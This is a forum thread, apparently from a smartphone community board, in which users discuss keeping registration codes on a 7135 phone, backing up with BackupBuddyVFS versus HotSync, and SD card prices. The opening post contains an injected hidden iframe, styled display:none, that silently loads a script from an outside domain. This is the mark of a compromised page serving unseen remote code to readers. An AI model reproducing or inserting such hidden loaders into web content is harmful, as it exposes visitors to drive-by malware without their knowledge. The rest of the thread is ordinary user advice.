+ Reply to Thread

registration codes

with all the new software we are all downloading to our 7135, can anyone suggest a program that I can download that will store all my registration codes and version numbers without opening the programs? I realize that I can go to info to get the version, but if I lose any data due to low battery or hard reset, it would be nice to have a program on the device that stores all the reg. codes.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

If you have an SD card, just get BackupBuddyVFS and back up your entire 7135's contents to the card. If you have a hard reset/dead battery, you can restore all of your apps, and the registration info will be restored as well.

Cool James,

To answer your question, you can purchase Passwords Plus like I did and keep all kinds of passwords, IDS, etc. synched and protected.

Dennya,

I've got a question of you. I am contemplating an SD card purchase. I bought one at Costco (SanDisk 128 MB SD) for $49.99, but never loaded anything on it and returned it my next trip to Costco. Question 1 - if you get a big card (i.e. 128, 256, 512) can you load up the card and still have BackupBuddyVFS operate properly - restoring everything "as is" on your phone in case of a hard reset/battery death? Question 2 - The main reason I would even be buying an SD card is the BackupBuddy thing in case of hard reset/battery death. Does a synch with your PC via cradle completely restore your phone - all software, settings, everything? If so, maybe I don't need the card because I'm not away from home for too long at any time.

What about brands/prices? As I said I bought a SanDisk 128 MB SD card at Costco for $49 and returned it. I've seen (thanks to another thread on this board) a SanDisk 256 MB SD card at Amazon for $66 I believe. Anything better than that? Are the 512s out of whack price-wise? $300+?

Any help in determining my need for and/or best bet on an SD card would be greatly appreciated by you or anyone else on this board.

You all are the best.

Originally posted by Peter
    Dennya,

I've got a question of you. I am contemplating an SD card purchase. I bought one at Costco (SanDisk 128 MB SD) for $49.99, but never loaded anything on it and returned it my next trip to Costco. Question 1 - if you get a big card (i.e. 128, 256, 512) can you load up the card and still have BackupBuddyVFS operate properly - restoring everything "as is" on your phone in case of a hard reset/battery death?
    Is anyone else allowed to respond to this? :p

1- I have a 256MB card, and have it loaded up with lots of MP3's, Word and Excel files, and some apps that run directly from the card. I have done 5-6 full restores from BackupBuddyVFS and they have all worked flawlessly. 2- A hotsync should restore everything also (but I am not 100% sure about that... for some reason I've always had it in my head that syncing does not backup as thoroughly as BBVFS).
    Please visit my picture site: Robert-O-Rama :)

Originally posted by Robert K.

2- A hotsync should restore everything also (but I am not 100% sure about that... for some reason I've always had it in my head that syncing does not backup as thoroughly as BBVFS).
    My experience is that BBVFS does a much more complete job of restoring apps. I often find that a hot sync restore does not restore previous settings and suspect it has to do with not all files being backed up with hot syncing. For example, I do not believe HS restores voice dialing. Besides, BBVFS is great when you are away from your computer. I recently did a BBVFS restore at an airport and it made my life a whole lot easier.

Originally posted by Robert K.

1- I have a 256MB card, and have it loaded up with lots of MP3's, Word and Excel files, and some apps that run directly from the card. I have done 5-6 full restores from BackupBuddyVFS and they have all worked flawlessly. 2- A hotsync should restore everything also (but I am not 100% sure about that... for some reason I've always had it in my head that syncing does not backup as thoroughly as BBVFS).
    Robert,

That's why I said "any help from you or anyone else ... would be greatly appreciated." So, thanks Robert.

That's what I wanted to know - could you use 8, 10, 12 MB or whatever it would take to hold BackupBuddyVFS and the copy of all the RAM on your phone then use the rest for other storage? You say yes, and since you have two trillion posts and have owned every palm device known to man, I guess I'll just accept it as gospel.

Thanks brother.

Amen.

What about prices, though?

Anyone?

I'm leaning towards that 256MB SanDisk on Amazon with free shipping for $66. I guess I'll need to get this card and BackupBuddyVFS thing going before I'm able to do the Verizon flash upgrade thing, right? Doesn't flashing delete everything? Do I need to have the card removed when they flash (whenever they're capable of this finally)?

There was a 256 card with Cruzer for 69 at ecost.com...

The deal expired, now it is $79
    Walt

the thread about the cheap cards was moved to the classifieds. http://www.smartphonesource.com/vbul...&threadid=6374

Side note, I'm pretty sure that I found at ecost.com the 32 Mb Sandisk SD Expansion Card for under $30. It comes with a version(not sure if freeware of full) of backupbuddy already on the card.

Since the phone is coming today, I havn't tried it yet.

Originally posted by Jazzman
    the thread about the cheap cards was moved to the classifieds. http://www.smartphonesource.com/vbul...&threadid=6374

Side note, I'm pretty sure that I found at ecost.com the 32 Mb Sandisk SD Expansion Card for under $30. It comes with a version(not sure if freeware of full) of backupbuddy already on the card.

Since the phone is coming today, I havn't tried it yet.
    Jazzman, do you have a link to that? If I can get that with a full version of BackupBuddyVFS for $30, I'll pull the trigger on that. I'm not too wild about having MP3s or anything, just want to backup all RAM in case I need to do a restore while away from home.

How much are cruzers by themselves?